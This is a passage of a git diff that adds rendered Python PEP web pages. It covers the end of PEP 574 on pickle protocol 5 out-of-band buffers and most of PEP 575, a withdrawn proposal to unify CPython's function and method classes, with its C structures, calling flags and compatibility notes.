+    def __init__(self, *args, buffers, **kwargs):
+        super().__init__(*args, **kwargs)
+        self.buffers = buffers
+
+    def persistent_load(self, pid):
+        type_tag, index = pid
+        if type_tag == 'bytearray':
+            return self.buffers[index]
+        else:
+            assert 0  # unexpected type
+
+
+

This mechanism has two drawbacks:

+
    +
  • Each pickle consumer must reimplement Pickler and Unpickler +subclasses, with custom code for each type of interest. Essentially, +N pickle consumers end up each implementing custom code for M producers. +This is difficult (especially for sophisticated types such as Numpy +arrays) and poorly scalable.
  • +
  • Each object encountered by the pickle module (even simple built-in objects +such as ints and strings) triggers a call to the user’s persistent_id() +method, leading to a possible performance drop compared to nominal.

    (the Python 2 cPickle module supported an undocumented +inst_persistent_id() hook that was only called on non-built-in types; +it was added in 1997 in order to alleviate the performance issue of +calling persistent_id, presumably at ZODB’s request)

    +
  • +
+
+
+

Passing a sequence of buffers in buffer_callback

+

By passing a sequence of buffers, rather than a single buffer, we would +potentially save on function call overhead in case a large number +of buffers are produced during serialization. This would need +additional support in the Pickler to save buffers before calling the +callback. However, it would also prevent the buffer callback from returning +a boolean to indicate whether a buffer is to be serialized in-band or +out-of-band.

+

We consider that having a large number of buffers to serialize is an +unlikely case, and decided to pass a single buffer to the buffer callback.

+
+
+

Allow serializing a PickleBuffer in protocol 4 and earlier

+

If we were to allow serializing a PickleBuffer in protocols 4 and earlier, +it would actually make a supplementary memory copy when the buffer is mutable. +Indeed, a mutable PickleBuffer would serialize as a bytearray object +in those protocols (that is a first copy), and serializing the bytearray +object would call bytearray.__reduce_ex__ which returns a bytes object +(that is a second copy).

+

To prevent __reduce__ implementors from introducing involuntary +performance regressions, we decided to reject PickleBuffer when +the protocol is smaller than 5. This forces implementors to switch to +__reduce_ex__ and implement protocol-dependent serialization, taking +advantage of the best path for each protocol (or at least treat protocol +5 and upwards separately from protocols 4 and downwards).

+
+
+
+

Implementation

+

The PEP was initially implemented in the author’s GitHub fork [6]. +It was later merged into Python 3.8 [7].

+

A backport for Python 3.6 and 3.7 is downloadable from PyPI +[8].

+

Support for pickle protocol 5 and out-of-band buffers was added to Numpy +[11].

+

Support for pickle protocol 5 and out-of-band buffers was added to the Apache +Arrow Python bindings [9].

+
+ +
+

Acknowledgements

+

Thanks to the following people for early feedback: Alyssa Coghlan, Olivier +Grisel, Stefan Krah, MinRK, Matt Rocklin, Eric Snow.

+

Thanks to Pierre Glaser and Olivier Grisel for experimenting with the +implementation.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0574.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0575/index.html b/pep-0575/index.html new file mode 100644 index 00000000000..988dd9c3372 --- /dev/null +++ b/pep-0575/index.html @@ -0,0 +1,1213 @@ + + + + + + + + PEP 575 – Unifying function/method classes | peps.python.org + + +
+
+


+ + +
+
+
+

PEP 575 – Unifying function/method classes

+
+
Author:
+
Jeroen Demeyer <J.Demeyer at UGent.be>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
27-Mar-2018
+
Python-Version:
+
3.8
+
Post-History:
+
31-Mar-2018, 12-Apr-2018, 27-Apr-2018, 05-May-2018
+
+
+
+
+
+

Withdrawal notice

+

See PEP 580 for a better solution to allowing fast calling of custom classes.

+

See PEP 579 for a broader discussion of some of the other issues from this PEP.

+
+
+

Abstract

+

Reorganize the class hierarchy for functions and methods +with the goal of reducing the difference between +built-in functions (implemented in C) and Python functions. +Mainly, make built-in functions behave more like Python functions +without sacrificing performance.

+

A new base class base_function is introduced and the various function +classes, as well as method (renamed to bound_method), inherit from it.

+

We also allow subclassing the Python function class.

+
+
+

Motivation

+

Currently, CPython has two different function classes: +the first is Python functions, which is what you get +when defining a function with def or lambda. +The second is built-in functions such as len, isinstance or numpy.dot. +These are implemented in C.

+

These two classes are implemented completely independently and have different functionality. +In particular, it is currently not possible to implement a function efficiently in C +(only built-in functions can do that) +while still allowing introspection like inspect.signature or inspect.getsourcefile +(only Python functions can do that). +This is a problem for projects like Cython [1] that want to do exactly that.

+

In Cython, this was worked around by inventing a new function class called cyfunction. +Unfortunately, a new function class creates problems: +the inspect module does not recognize such functions as being functions [2] +and the performance is worse +(CPython has specific optimizations for calling built-in functions).

+

A second motivation is more generally making built-in functions and methods +behave more like Python functions and methods. +For example, Python unbound methods are just functions but +unbound methods of extension types (e.g. dict.get) are a distinct class. +Bound methods of Python classes have a __func__ attribute, +bound methods of extension types do not.

+

Third, this PEP allows great customization of functions. +The function class becomes subclassable and custom function +subclasses are also allowed for functions implemented in C. +In the latter case, this can be done with the same performance +as true built-in functions. +All functions can access the function object +(the self in __call__), paving the way for PEP 573.

+
+
+

New classes

+

This is the new class hierarchy for functions and methods:

+
              object
+                 |
+                 |
+          base_function
+         /       |     \
+        /        |      \
+       /         |   defined_function
+      /          |        \
+cfunction (*)    |         \
+                 |       function
+                 |
+           bound_method (*)
+
+
+

The two classes marked with (*) do not allow subclassing; +the others do.

+

There is no difference between functions and unbound methods, +while bound methods are instances of bound_method.

+
+

base_function

+

The class base_function becomes a new base class for all function types. +It is based on the existing builtin_function_or_method class, +but with the following differences and new features:

+
    +
  1. It acts as a descriptor implementing __get__ to turn a function into a method +if m_self is NULL. +If m_self is not NULL, +then this is a no-op: the existing function is returned instead.
  2. +
  3. A new read-only attribute __parent__, represented in the C structure as m_parent. +If this attribute exists, it represents the defining object. +For methods of extension types, this is the defining class (__class__ in plain Python) +and for functions of a module, this is the defining module. +In general, it can be any Python object. +If __parent__ is a class, it carries special semantics: +in that case, the function must be called with self being an instance of that class. +Finally, __qualname__ and __reduce__ will use __parent__ +as namespace (instead of __self__ before).
  4. +
  5. A new attribute __objclass__ which equals __parent__ if __parent__ +is a class. Otherwise, accessing __objclass__ raises AttributeError. +This is meant to be backwards compatible with method_descriptor.
  6. +
  7. The field ml_doc and the attributes __doc__ and +__text_signature__ (see Argument Clinic) +are not supported.
  8. +
  9. A new flag METH_PASS_FUNCTION for ml_flags. +If this flag is set, the C function stored in ml_meth is called with +an additional first argument equal to the function object.
  10. +
  11. A new flag METH_BINDING for ml_flags which only applies to +functions of a module (not methods of a class). +If this flag is set, then m_self is set to NULL instead +of the module. +This allows the function to behave more like a Python function +as it enables __get__.
  12. +
  13. A new flag METH_CALL_UNBOUND to disable self slicing.
  14. +
  15. A new flag METH_PYTHON for ml_flags. +This flag indicates that this function should be treated as a Python function. +Ideally, use of this flag should be avoided because it goes +against the duck typing philosophy. +It is still needed in a few places though, for example profiling.
  16. +
+

The goal of base_function is that it supports all different ways +of calling functions and methods in just one structure. +For example, the new flag METH_PASS_FUNCTION +will be used by the implementation of methods.

+

It is not possible to directly create instances of base_function +(tp_new is NULL). +However, it is legal for C code to manually create instances.

+

These are the relevant C structures:

+
PyTypeObject PyBaseFunction_Type;
+
+typedef struct {
+    PyObject_HEAD
+    PyCFunctionDef *m_ml;     /* Description of the C function to call */
+    PyObject *m_self;         /* __self__: anything, can be NULL; readonly */
+    PyObject *m_module;       /* __module__: anything (typically str) */
+    PyObject *m_parent;       /* __parent__: anything, can be NULL; readonly */
+    PyObject *m_weakreflist;  /* List of weak references */
+} PyBaseFunctionObject;
+
+typedef struct {
+    const char *ml_name;   /* The name of the built-in function/method */
+    PyCFunction ml_meth;   /* The C function that implements it */
+    int ml_flags;          /* Combination of METH_xxx flags, which mostly
+                              describe the args expected by the C func */
+} PyCFunctionDef;
+
+
+

Subclasses may extend PyCFunctionDef with extra fields.

+

The Python attribute __self__ returns m_self, +except if METH_STATIC is set. +In that case or if m_self is NULL, +then there is no __self__ attribute at all. +For that reason, we write either m_self or __self__ in this PEP +with slightly different meanings.

+
+
+

cfunction

+

This is the new version of the old builtin_function_or_method class. +The name cfunction was chosen to avoid confusion with “built-in” +in the sense of “something in the builtins module”. +It also fits better with the C API, which uses the PyCFunction prefix.

+

The class cfunction is a copy of base_function, with the following differences:

+
    +
  1. m_ml points to a PyMethodDef structure, +extending PyCFunctionDef with an additional ml_doc +field to implement __doc__ and __text_signature__ +as read-only attributes:
    typedef struct {
    +    const char *ml_name;
    +    PyCFunction ml_meth;
    +    int ml_flags;
    +    const char *ml_doc;
    +} PyMethodDef;
    +
    +
    +

    Note that PyMethodDef is part of the Python Stable ABI +and it is used by practically all extension modules, +so we absolutely cannot change this structure.

    +
  2. +
  3. Argument Clinic is supported.
  4. +
  5. __self__ always exists. In the cases where base_function.__self__ +would raise AttributeError, instead None is returned.
  6. +
+

The type object is PyTypeObject PyCFunction_Type +and we define PyCFunctionObject as alias of PyBaseFunctionObject +(except for the type of m_ml).

+
+
+

defined_function

+

The class defined_function is an abstract base class meant +to indicate that the function has introspection support. +Instances of defined_function are required to support all attributes +that Python functions have, namely +__code__, __globals__, __doc__, +__defaults__, __kwdefaults__, __closure__ and __annotations__. +There is also a __dict__ to support attributes added by the user.

+

None of these is required to be meaningful. +In particular, __code__ may not be a working code object, +possibly only a few fields may be filled in. +This PEP does not dictate how the various attributes are implemented. +They may be simple struct members or more complicated descriptors. +Only read-only support is required, none of the attributes is required to be writable.

+

The class defined_function is mainly meant for auto-generated C code, +for example produced by Cython [1]. +There is no API to create instances of it.

+

The C structure is the following:

+
PyTypeObject PyDefinedFunction_Type;
+
+typedef struct {
+    PyBaseFunctionObject base;
+    PyObject *func_dict;        /* __dict__: dict or NULL */
+} PyDefinedFunctionObject;
+
+
+

TODO: maybe find a better name for defined_function. +Other proposals: inspect_function (anything that satisfies inspect.isfunction), +builtout_function (a function that is better built out; pun on builtin), +generic_function (original proposal but conflicts with functools.singledispatch generic functions), +user_function (defined by the user as opposed to CPython).

+
+
+

function

+

This is the class meant for functions implemented in Python. +Unlike the other function types, +instances of function can be created from Python code. +This is not changed, so we do not describe the details in this PEP.

+

The layout of the C structure is the following:

+
PyTypeObject PyFunction_Type;
+
+typedef struct {
+    PyBaseFunctionObject base;
+    PyObject *func_dict;        /* __dict__: dict or NULL */
+    PyObject *func_code;        /* __code__: code */
+    PyObject *func_globals;     /* __globals__: dict; readonly */
+    PyObject *func_name;        /* __name__: string */
+    PyObject *func_qualname;    /* __qualname__: string */
+    PyObject *func_doc;         /* __doc__: can be anything or NULL */
+    PyObject *func_defaults;    /* __defaults__: tuple or NULL */
+    PyObject *func_kwdefaults;  /* __kwdefaults__: dict or NULL */
+    PyObject *func_closure;     /* __closure__: tuple of cell objects or NULL; readonly */
+    PyObject *func_annotations; /* __annotations__: dict or NULL */
+    PyCFunctionDef _ml;         /* Storage for base.m_ml */
+} PyFunctionObject;
+
+
+

The descriptor __name__ returns func_name. +When setting __name__, also base.m_ml->ml_name is updated +with the UTF-8 encoded name.

+

The _ml field reserves space to be used by base.m_ml.

+

A base_function instance must have the flag METH_PYTHON set +if and only if it is an instance of function.

+

When constructing an instance of function from code and globals, +an instance is created with base.m_ml = &_ml, +base.m_self = NULL.

+

To make subclassing easier, we also add a copy constructor: +if f is an instance of function, then types.FunctionType(f) copies f. +This conveniently allows using a custom function type as decorator:

+
>>> from types import FunctionType
+>>> class CustomFunction(FunctionType):
+...     pass
+>>> @CustomFunction
+... def f(x):
+...     return x
+>>> type(f)
+<class '__main__.CustomFunction'>
+
+
+

This also removes many use cases of functools.wraps: +wrappers can be replaced by subclasses of function.

+
+
+

bound_method

+

The class bound_method is used for all bound methods, +regardless of the class of the underlying function. +It adds one new attribute on top of base_function: +__func__ points to that function.

+

bound_method replaces the old method class +which was used only for Python functions bound as method.

+

There is a complication because we want to allow +constructing a method from an arbitrary callable. +This may be an already-bound method or simply not an instance of base_function. +Therefore, in practice there are two kinds of methods:

+
    +
  • For arbitrary callables, we use a single fixed PyCFunctionDef +structure with the METH_PASS_FUNCTION flag set.
  • +
  • For methods which bind instances of base_function +(more precisely, which have the Py_TPFLAGS_BASEFUNCTION flag set) +that have self slicing, +we instead use the PyCFunctionDef from the original function. +This way, we don’t lose any performance when calling bound methods. +In this case, the __func__ attribute is only used to implement +various attributes but not for calling the method.
  • +
+

When constructing a new method from a base_function, +we check that the self object is an instance of __objclass__ +(if a class was specified as parent) and raise a TypeError otherwise.

+

The C structure is:

+
PyTypeObject PyMethod_Type;
+
+typedef struct {
+    PyBaseFunctionObject base;
+    PyObject *im_func;  /* __func__: function implementing the method; readonly */
+} PyMethodObject;
+
+
+
+
+
+

Calling base_function instances

+

We specify the implementation of __call__ for instances of base_function.

+
+

Checking __objclass__

+

First of all, a type check is done if the __parent__ of the function +is a class +(recall that __objclass__ then becomes an alias of __parent__): +if m_self is NULL (this is the case for unbound methods of extension types), +then the function must be called with at least one positional argument +and the first (typically called self) must be an instance of __objclass__. +If not, a TypeError is raised.
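This mirrors the check that method_descriptor already performs in current Python (the error message shown is CPython 3.7's wording):

>>> dict.get({'a': 1}, 'a')   # self is a dict instance: accepted
1
>>> dict.get([], 'a')         # self is not a dict instance
Traceback (most recent call last):
  ...
TypeError: descriptor 'get' requires a 'dict' object but received a 'list'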

+

Note that bound methods have m_self != NULL, so the __objclass__ +is not checked. +Instead, the __objclass__ check is done when constructing the method.

+
+
+

Flags

+

For convenience, we define a new constant: +METH_CALLFLAGS combines all flags from PyCFunctionDef.ml_flags +which specify the signature of the C function to be called. +It is equal to

+
METH_VARARGS | METH_FASTCALL | METH_NOARGS | METH_O | METH_KEYWORDS | METH_PASS_FUNCTION
+
+
+

Exactly one of the first four flags above must be set +and only METH_VARARGS and METH_FASTCALL may be combined with METH_KEYWORDS. +Violating these rules is undefined behaviour.

+

There are two new flags which affect calling functions, +namely METH_PASS_FUNCTION and METH_CALL_UNBOUND. +Some flags are already documented in [5]. +We explain the others below.

+
+
+

Self slicing

+

If the function has m_self == NULL and the flag METH_CALL_UNBOUND +is not set, then the first positional argument (if any) +is removed from *args and instead passed as first argument to the C function. +Effectively, the first positional argument is treated as __self__. +This is meant to support unbound methods +such that the C function does not see the difference +between bound and unbound method calls. +This does not affect keyword arguments in any way.

+

This process is called self slicing and a function is said to +have self slicing if m_self == NULL and METH_CALL_UNBOUND is not set.

+

Note that a METH_NOARGS function which has self slicing +effectively has one argument, namely self. +Analogously, a METH_O function with self slicing has two arguments.
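The observable equivalence that self slicing is designed to preserve can be seen from Python today:

>>> d = {'a': 1}
>>> dict.get(d, 'a')    # unbound call: self passed as first positional argument
1
>>> d.get('a')          # bound call: self supplied by the method object
1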

+
+
+

METH_PASS_FUNCTION

+

If this flag is set, then the C function is called with an +additional first argument, namely the function itself +(the base_function instance). +As special case, if the function is a bound_method, +then the underlying function of the method is passed +(but not recursively: if a bound_method wraps a bound_method, +then __func__ is only applied once).

+

For example, an ordinary METH_VARARGS function has signature +(PyObject *self, PyObject *args). +With METH_VARARGS | METH_PASS_FUNCTION, this becomes +(PyObject *func, PyObject *self, PyObject *args).

+
+
+

METH_FASTCALL

+

This is an existing but undocumented flag. +We suggest officially supporting and documenting it.

+

If the flag METH_FASTCALL is set without METH_KEYWORDS, +then the ml_meth field is of type PyCFunctionFast +which takes the arguments (PyObject *self, PyObject *const *args, Py_ssize_t nargs). +Such a function takes only positional arguments and they are passed as plain C array +args of length nargs.

+

If the flags METH_FASTCALL | METH_KEYWORDS are set, +then the ml_meth field is of type PyCFunctionFastKeywords +which takes the arguments (PyObject *self, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames). +The positional arguments are passed as C array args of length nargs. +The values of the keyword arguments follow in that array, +starting at position nargs. +The keys (names) of the keyword arguments are passed as a tuple in kwnames. +As an example, assume that 3 positional and 2 keyword arguments are given. +Then args is an array of length 3 + 2 = 5, nargs equals 3 and kwnames is a 2-tuple.
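As a concrete illustration (Python pseudo-values rather than C), a call like f(1, 2, 3, x=4, y=5) would arrive as:

args = (1, 2, 3, 4, 5)   # positional values, then keyword values
nargs = 3                # number of positional arguments
kwnames = ('x', 'y')     # keyword argument names, matching args[3:]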

+
+
+
+

Automatic creation of built-in functions

+

Python automatically generates instances of cfunction +for extension types (using the PyTypeObject.tp_methods field) and modules +(using the PyModuleDef.m_methods field). +The arrays PyTypeObject.tp_methods and PyModuleDef.m_methods +must be arrays of PyMethodDef structures.

+
+

Unbound methods of extension types

+

The type of unbound methods changes from method_descriptor +to cfunction. +The object which appears as unbound method is the same object which +appears in the class __dict__. +Python automatically sets the __parent__ attribute to the defining class.

+
+
+

Built-in functions of a module

+

For the case of functions of a module, +__parent__ will be set to the module. +Unless the flag METH_BINDING is given, also __self__ +will be set to the module (for backwards compatibility).

+

An important consequence is that such functions by default +do not become methods when used as attribute +(base_function.__get__ only does that if m_self was NULL). +One could consider this a bug, but this was done for backwards compatibility reasons: +in an initial post on python-ideas [6] the consensus was to keep this +misfeature of built-in functions.

+

However, to allow this anyway for specific or newly implemented +built-in functions, the METH_BINDING flag prevents setting __self__.

+
+
+
+

Further changes

+
+

New type flag

+

A new PyTypeObject flag (for tp_flags) is added: +Py_TPFLAGS_BASEFUNCTION to indicate that instances of this type are +functions which can be called and bound as method like a base_function.

+

This is different from flags like Py_TPFLAGS_LIST_SUBCLASS +because it indicates more than just a subclass: +it also indicates a default implementation of __call__ and __get__. +In particular, such subclasses of base_function +must follow the implementation from the section Calling base_function instances.

+

This flag is automatically set for extension types which +inherit the tp_call and tp_descr_get implementation from base_function. +Extension types can explicitly specify it if they +override __call__ or __get__ in a compatible way. +The flag Py_TPFLAGS_BASEFUNCTION must never be set for a heap type +because that would not be safe (heap types can be changed dynamically).

+
+
+

C API functions

+

We list some relevant Python/C API macros and functions. +Some of these are existing (possibly changed) functions, some are new:

+
    +
  • int PyBaseFunction_CheckFast(PyObject *op): return true if op +is an instance of a class with the Py_TPFLAGS_BASEFUNCTION set. +This is the function that you need to use to determine +whether it is meaningful to access the base_function internals.
  • +
  • int PyBaseFunction_Check(PyObject *op): return true if op +is an instance of base_function.
  • +
  • PyObject *PyBaseFunction_New(PyTypeObject *cls, PyCFunctionDef *ml, PyObject *self, PyObject *module, PyObject *parent): +create a new instance of cls (which must be a subclass of base_function) +from the given data.
  • +
  • int PyCFunction_Check(PyObject *op): return true if op +is an instance of cfunction.
  • +
  • int PyCFunction_NewEx(PyMethodDef* ml, PyObject *self, PyObject* module): +create a new instance of cfunction. +As special case, if self is NULL, +then set self = Py_None instead (for backwards compatibility). +If self is a module, then __parent__ is set to self. +Otherwise, __parent__ is NULL.
  • +
  • For many existing PyCFunction_... and PyMethod_ functions, +we define a new function PyBaseFunction_... +acting on base_function instances. +The old functions are kept as aliases of the new functions.
  • +
  • int PyFunction_Check(PyObject *op): return true if op +is an instance of base_function with the METH_PYTHON flag set +(this is equivalent to checking whether op is an instance of function).
  • +
  • int PyFunction_CheckFast(PyObject *op): equivalent to +PyFunction_Check(op) && PyBaseFunction_CheckFast(op).
  • +
  • int PyFunction_CheckExact(PyObject *op): return true +if the type of op is function.
  • +
  • PyObject *PyFunction_NewPython(PyTypeObject *cls, PyObject *code, PyObject *globals, PyObject *name, PyObject *qualname): +create a new instance of cls (which must be a subclass of function) +from the given data.
  • +
  • PyObject *PyFunction_New(PyObject *code, PyObject *globals): +create a new instance of function.
  • +
  • PyObject *PyFunction_NewWithQualName(PyObject *code, PyObject *globals, PyObject *qualname): +create a new instance of function.
  • +
  • PyObject *PyFunction_Copy(PyTypeObject *cls, PyObject *func): +create a new instance of cls (which must be a subclass of function) +by copying a given function.
  • +
+
+
+

Changes to the types module

+

Two types are added: types.BaseFunctionType corresponding to +base_function and types.DefinedFunctionType corresponding to +defined_function.

+

Apart from that, no changes to the types module are made. +In particular, types.FunctionType refers to function. +However, the actual types will change: +in particular, types.BuiltinFunctionType will no longer be the same +as types.BuiltinMethodType.

+
+
+

Changes to the inspect module

+

The new function inspect.isbasefunction checks for an instance of base_function.

+

inspect.isfunction checks for an instance of defined_function.

+

inspect.isbuiltin checks for an instance of cfunction.

+

inspect.isroutine checks isbasefunction or ismethoddescriptor.

+

NOTE: bpo-33261 [3] should be fixed first.

+
+
+

Profiling

+

Currently, sys.setprofile supports c_call, c_return and c_exception +events for built-in functions. +These events are generated when calling or returning from a built-in function. +By contrast, the call and return events are generated by the function itself. +So nothing needs to change for the call and return events.

+

Since we no longer make a difference between C functions and Python functions, +we need to prevent the c_* events for Python functions. +This is done by not generating those events if the +METH_PYTHON flag in ml_flags is set.

+
+
+
+

Non-CPython implementations

+

Most of this PEP is only relevant to CPython. +For other implementations of Python, +the two changes that are required are the base_function base class +and the fact that function can be subclassed. +The classes cfunction and defined_function are not required.

+

We require base_function for consistency but we put no requirements on it: +it is acceptable if this is just a copy of object. +Support for the new __parent__ (and __objclass__) attribute is not required. +If there is no defined_function class, +then types.DefinedFunctionType should be an alias of types.FunctionType.

+
+
+

Rationale

+
+

Why not simply change existing classes?

+

One could try to solve the problem by keeping the existing classes +without introducing a new base_function class.

+

That might look like a simpler solution but it is not: +it would require introspection support for 3 distinct classes: +function, builtin_function_or_method and method_descriptor. +For the latter two classes, “introspection support” would mean +at a minimum allowing subclassing. +But we don’t want to lose performance, so we want fast subclass checks. +This would require two new flags in tp_flags. +And we want subclasses to allow __get__ for built-in functions, +so we should implement the LOAD_METHOD opcode for built-in functions too. +More generally, a lot of functionality would need to be duplicated +and the end result would be far more complex code.

+

It is also not clear how the introspection of built-in function subclasses +would interact with __text_signature__. +Having two independent kinds of inspect.signature support on the same +class sounds like asking for problems.

+

And this would not fix some of the other differences between built-in functions +and Python functions that were mentioned in the motivation.

+
+
+

Why __text_signature__ is not a solution

+

Built-in functions have an attribute __text_signature__, +which gives the signature of the function as plain text. +The default values are evaluated by ast.literal_eval. +Because of this, it supports only a small number of standard Python classes +and not arbitrary Python objects.

+

And even if __text_signature__ would allow arbitrary signatures somehow, +that is only one piece of introspection: +it does not help with inspect.getsourcefile for example.

+
+
+

defined_function versus function

+

In many places, a decision needs to be made whether the old function class +should be replaced by defined_function or the new function class. +This is done by thinking of the most likely use case:

+
    +
  1. types.FunctionType refers to function because that +type might be used to construct instances using types.FunctionType(...).
  2. +
  3. inspect.isfunction() refers to defined_function +because this is the class where introspection is supported.
  4. +
  5. The C API functions must refer to function because +we do not specify how the various attributes of defined_function +are implemented. +We expect that this is not a problem since there is typically no +reason for introspection to be done by C extensions.
  6. +
+
+
+

Scope of this PEP: which classes are involved?

+

The main motivation of this PEP is fixing function classes, +so we certainly want to unify the existing classes +builtin_function_or_method and function.

+

Since built-in functions and methods have the same class, +it seems natural to include bound methods too. +And since there are no “unbound methods” for Python functions, +it makes sense to get rid of unbound methods for extension types.

+

For now, no changes are made to the classes staticmethod, +classmethod and classmethod_descriptor. +It would certainly make sense to put these in the base_function +class hierarchy and unify classmethod and classmethod_descriptor. +However, this PEP is already big enough +and this is left as a possible future improvement.

+

Slot wrappers for extension types like __init__ or __eq__ +are quite different from normal methods. +They are also typically not called directly because you would normally +write foo[i] instead of foo.__getitem__(i). +So these are left outside the scope of this PEP.

+

Python also has an instancemethod class, +which seems to be a relic from Python 2, +where it was used for bound and unbound methods. +It is not clear whether there is still a use case for it. +In any case, there is no reason to deal with it in this PEP.

+

TODO: should instancemethod be deprecated? +It doesn’t seem used at all within CPython 3.7, +but maybe external packages use it?

+
+
+

Not treating METH_STATIC and METH_CLASS

+

Almost nothing in this PEP refers to the flags METH_STATIC and METH_CLASS. +These flags are checked only by the automatic creation of built-in functions. +When a staticmethod, classmethod or classmethod_descriptor +is bound (i.e. __get__ is called), +a base_function instance is created with m_self != NULL. +For a classmethod, this is obvious since m_self +is the class that the method is bound to. +For a staticmethod, one can take an arbitrary Python object for m_self. +For backwards compatibility, we choose m_self = __parent__ for static methods +of extension types.

+
+
+

__self__ in base_function

+

It may look strange at first sight to add the __self__ slot +in base_function as opposed to bound_method. +We took this idea from the existing builtin_function_or_method class. +It allows us to have a single general implementation of __call__ and __get__ +for the various function classes discussed in this PEP.

+

It also makes it easy to support existing built-in functions +which set __self__ to the module (for example, sys.exit.__self__ is sys).

+
+
+

Two implementations of __doc__

+

base_function does not support function docstrings. +Instead, the classes cfunction and function +each have their own way of dealing with docstrings +(and bound_method just takes the __doc__ from the wrapped function).

+

For cfunction, the docstring is stored (together with the text signature) +as C string in the read-only ml_doc field of a PyMethodDef. +For function, the docstring is stored as a writable Python object +and it does not actually need to be a string. +It looks hard to unify these two very different ways of dealing with __doc__. +For backwards compatibility, we keep the existing implementations.

+

For defined_function, we require __doc__ to be implemented +but we do not specify how. A subclass can implement __doc__ the +same way as cfunction or using a struct member or some other way.

+
+
+

Subclassing

+

We disallow subclassing of cfunction and bound_method +to enable fast type checks for PyCFunction_Check and PyMethod_Check.

+

We allow subclassing of the other classes because there is no reason to disallow it. +For Python modules, the only relevant class to subclass is +function because the others cannot be instantiated anyway.

+
+
+

Replacing tp_call: METH_PASS_FUNCTION and METH_CALL_UNBOUND

+

The new flags METH_PASS_FUNCTION and METH_CALL_UNBOUND +are meant to support cases where formerly a custom tp_call was used. +It reduces the number of special fast paths in Python/ceval.c +for calling objects: +instead of treating Python functions, built-in functions and method descriptors +separately, there would only be a single check.

+

The signature of tp_call is essentially the signature +of PyBaseFunctionObject.m_ml.ml_meth with flags +METH_VARARGS | METH_KEYWORDS | METH_PASS_FUNCTION | METH_CALL_UNBOUND +(the only difference is an added self argument). +Therefore, it should be easy to change existing tp_call slots +to use the base_function implementation instead.

+

It also makes sense to use METH_PASS_FUNCTION without METH_CALL_UNBOUND +in cases where the C function simply needs access to additional metadata +from the function, such as the __parent__. +This is for example needed to support PEP 573. +Converting existing methods to use METH_PASS_FUNCTION is trivial: +it only requires adding an extra argument to the C function.

+
+
+
+

Backwards compatibility

+

While designing this PEP, great care was taken to not break +backwards compatibility too much. +Most of the potentially incompatible changes +are changes to CPython implementation details +which are different anyway in other Python interpreters. +In particular, Python code which correctly runs on PyPy +will very likely continue to work with this PEP.

+

The standard classes and functions like +staticmethod, functools.partial or operator.methodcaller +do not need to change at all.

+
+

Changes to types and inspect

+

The proposed changes to types and inspect +are meant to minimize changes in behaviour. +However, it is unavoidable that some things change +and this can cause code which uses types or inspect to break. +In the Python standard library for example, +changes are needed in the doctest module because of this.

+

Also, tools which take various kinds of functions as input will need to deal +with the new function hierarchy and the possibility of custom +function classes.

+
+
+

Python functions

+

For Python functions, essentially nothing changes. +The attributes that existed before still exist and Python functions +can be initialized, called and turned into methods as before.

+

The name function is kept for backwards compatibility. +While it might make sense to change the name to something more +specific like python_function, +that would require a lot of annoying changes in documentation and testsuites.

+
+
+

Built-in functions of a module

+

Also for built-in functions, nothing changes. +We keep the old behaviour that such functions do not bind as methods. +This is a consequence of the fact that __self__ is set to the module.

+
+
+

Built-in bound and unbound methods

+

The types of built-in bound and unbound methods will change. +However, this does not affect calling such methods +because the protocol in base_function.__call__ +(in particular the handling of __objclass__ and self slicing) +was specifically designed to be backwards compatible. +All attributes which existed before (like __objclass__ and __self__) +still exist.

+
+
+

New attributes

+

Some objects get new special double-underscore attributes. +For example, the new attribute __parent__ appears on +all built-in functions and all methods get a __func__ attribute. +The fact that __self__ is now a special read-only attribute +for Python functions caused trouble in [4]. +Generally, we expect that not much will break though.

+
+
+

method_descriptor and PyDescr_NewMethod

+

The class method_descriptor and the constructor PyDescr_NewMethod +should be deprecated. +They are no longer used by CPython itself but are still supported.

+
+
+
+

Two-phase Implementation

+

TODO: this section is optional. +If this PEP is accepted, it should +be decided whether to apply this two-phase implementation or not.

+

As mentioned above, the changes to types and inspect can break some +existing code. +In order to further minimize breakage, this PEP could be implemented +in two phases.

+
+

Phase one: keep existing classes but add base classes

+

Initially, implement the base_function class +and use it as common base class but otherwise keep the existing classes +(but not their implementation).

+

In this proposal, the class hierarchy would become:

+
                      object
+                         |
+                         |
+                  base_function
+                 /       |     \
+                /        |      \
+               /         |       \
+      cfunction          |     defined_function
+       |     |           |         \
+       |     |      bound_method    \
+       |     |                       \
+       |  method_descriptor       function
+       |
+builtin_function_or_method
+
+
+

The leaf classes builtin_function_or_method, method_descriptor, +bound_method and function correspond to the existing classes +(with method renamed to bound_method).

+

Functions automatically created in modules become instances +of builtin_function_or_method. +Unbound methods of extension types become instances of method_descriptor.

+

The class method_descriptor is a copy of cfunction except +that __get__ returns a builtin_function_or_method instead of a +bound_method.

+

The class builtin_function_or_method has the same C structure as a +bound_method, but it inherits from cfunction. +The __func__ attribute is not mandatory: +it is only defined when binding a method_descriptor.

+

We keep the implementation of the inspect functions as they are. +Because of this and because the existing classes are kept, +backwards compatibility is ensured for code doing type checks.

+

Since showing an actual DeprecationWarning would affect a lot +of correctly-functioning code, +any deprecations would only appear in the documentation. +Another reason is that it is hard to show warnings for calling isinstance(x, t) +(but it could be done using __instancecheck__ hacking) +and impossible for type(x) is t.

+
+
+

Phase two

+

Phase two is what is actually described in the rest of this PEP. +In terms of implementation, +it would be a relatively small change compared to phase one.

+
+
+
+

Reference Implementation

+

Most of this PEP has been implemented for CPython at +https://github.com/jdemeyer/cpython/tree/pep575

+

There are four steps, corresponding to the commits on that branch. +After each step, CPython is in a mostly working state.

+
    +
  1. Add the base_function class and make it a subclass for cfunction. +This is by far the biggest step as the complete __call__ protocol +is implemented in this step.
  2. +
  3. Rename method to bound_method and make it a subclass of base_function. +Change unbound methods of extension types to be instances of cfunction +such that bound methods of extension types are also instances of bound_method.
  4. +
  5. Implement defined_function and function.
  6. +
  7. Changes to other parts of Python, such as the standard library and testsuite.
  8. +
+
+
+

Appendix: current situation

+

NOTE: +This section is more useful during the draft period of the PEP, +so feel free to remove this once the PEP has been accepted.

+

For reference, we describe in detail the relevant existing classes in CPython 3.7.

+

Each of the classes involved is an “orphan” class +(no non-trivial subclasses nor superclasses).

+
+

builtin_function_or_method: built-in functions and bound methods

+

These are of type PyCFunction_Type +with structure PyCFunctionObject:

+
typedef struct {
+    PyObject_HEAD
